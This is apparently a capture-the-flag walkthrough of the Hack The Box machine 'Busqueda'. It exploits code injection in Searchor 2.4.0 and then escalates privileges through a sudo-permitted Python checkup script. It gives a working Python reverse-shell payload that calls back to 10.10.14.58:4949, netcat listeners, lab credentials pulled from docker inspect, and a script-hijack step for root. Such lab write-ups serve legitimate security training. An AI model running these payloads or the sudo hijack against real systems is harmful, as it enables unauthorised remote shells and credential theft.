I’v tried tried to searche on the web with http://busqueda.htb but i’ve been redirected to http://searcher.htb.
You need to add it to your host file.
nmap
1 | rustscan -a busqueda.htb |
Output:
1 | PORT STATE SERVICE REASON |
webpage
This is the request of this page:
Wappalyzer
Flask is interesting it’s a python server.
It’s aloso using Werkzeug/2.1.2.
It’a also using Searchor 2.4.0.
https://github.com/ArjunSharda/Searchor
This module is vulnerable:
https://security.snyk.io/package/pip/searchor
I can find any poc, so I need to do it myself, let’s see the change.
RCE
https://medium.com/@bdemir/a-pentesters-guide-to-code-injection-dcfa774a4431
Listen first:
1 | nc -lnvp 4949 |
Payload:
1 | engine=Accuweather&query=', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.58',4949));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))# |
1 | python3 -c 'import pty;pty.spawn("/bin/bash")' |
ctrl+z
1 | stty raw -echo; fg # allow auto completion |
Enum
1 | cd /home/svc |
Output:
1 | [user] |
We have a user: cody
let’s search in /var/www/app for interesting files.
.git is interesting and this is what we can found:
don’t forget to put gitea.searcher.htb in the /etc/hosts file.
This is the password of the user svc:jh1usoih2bkjaspwe92
sudo -l
with the password we can use sudo:
1 | sudo -l |
Output:
1 | User svc may run the following commands on busqueda: |
1 | sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps |
Output:
1 | CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES |
Docker-inspect
https://buildvirtual.net/how-to-use-docker-inspect/
1 | sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect --format='{{ .Config }}' f84a6b33fb5a |
Output:
1 | --format={f84a6b33fb5a false false false map[3306/tcp:{} 33060/tcp:{}] false false false [MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF MYSQL_USER=gitea MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh MYSQL_DATABASE=gitea PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin GOSU_VERSION=1.14 MYSQL_MAJOR=8.0 MYSQL_VERSION=8.0.31-1.el8 MYSQL_SHELL_VERSION=8.0.31-1.el8] [mysqld] <nil> false mysql:8 map[/var/lib/mysql:{}] [docker-entrypoint.sh] false [] map[com.docker.compose.config-hash:1b3f25a702c351e42b82c1867f5761829ada67262ed4ab55276e50538c54792b com.docker.compose.container-number:1 com.docker.compose.oneoff:False com.docker.compose.project:docker com.docker.compose.project.config_files:docker-compose.yml com.docker.compose.project.working_dir:/root/scripts/docker com.docker.compose.service:db com.docker.compose.version:1.29.2] <nil> []} |
Mysql root password: jI86kGUuj87guWr3RyF
Mysql user : gitea
Mysql gitea password: yuiu1hoiu4i5ho1uh
GOSU_VERSION=1.14
gitea
you can loggin with the user cody via this link:
http://cody:[email protected]/cody/Searcher_site.git
you need to add gitea.searcher.htb to the hosts file.
There is 2 users.
I’m logged as administrator via the password we found previously.
Mysql gitea password: yuiu1hoiu4i5ho1uh
There is few scripts.
In the script system-checkup.py:
Exploit
We can replace full-checkup.sh by our script, we just need to create it in an another directory.
In the file /home/svc/.peanut/full-checkup.sh I place the revershell :
1 |
|
Now listen with netcat:
1 | nc -nlvp <Port> |
And start the script:
1 | sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup |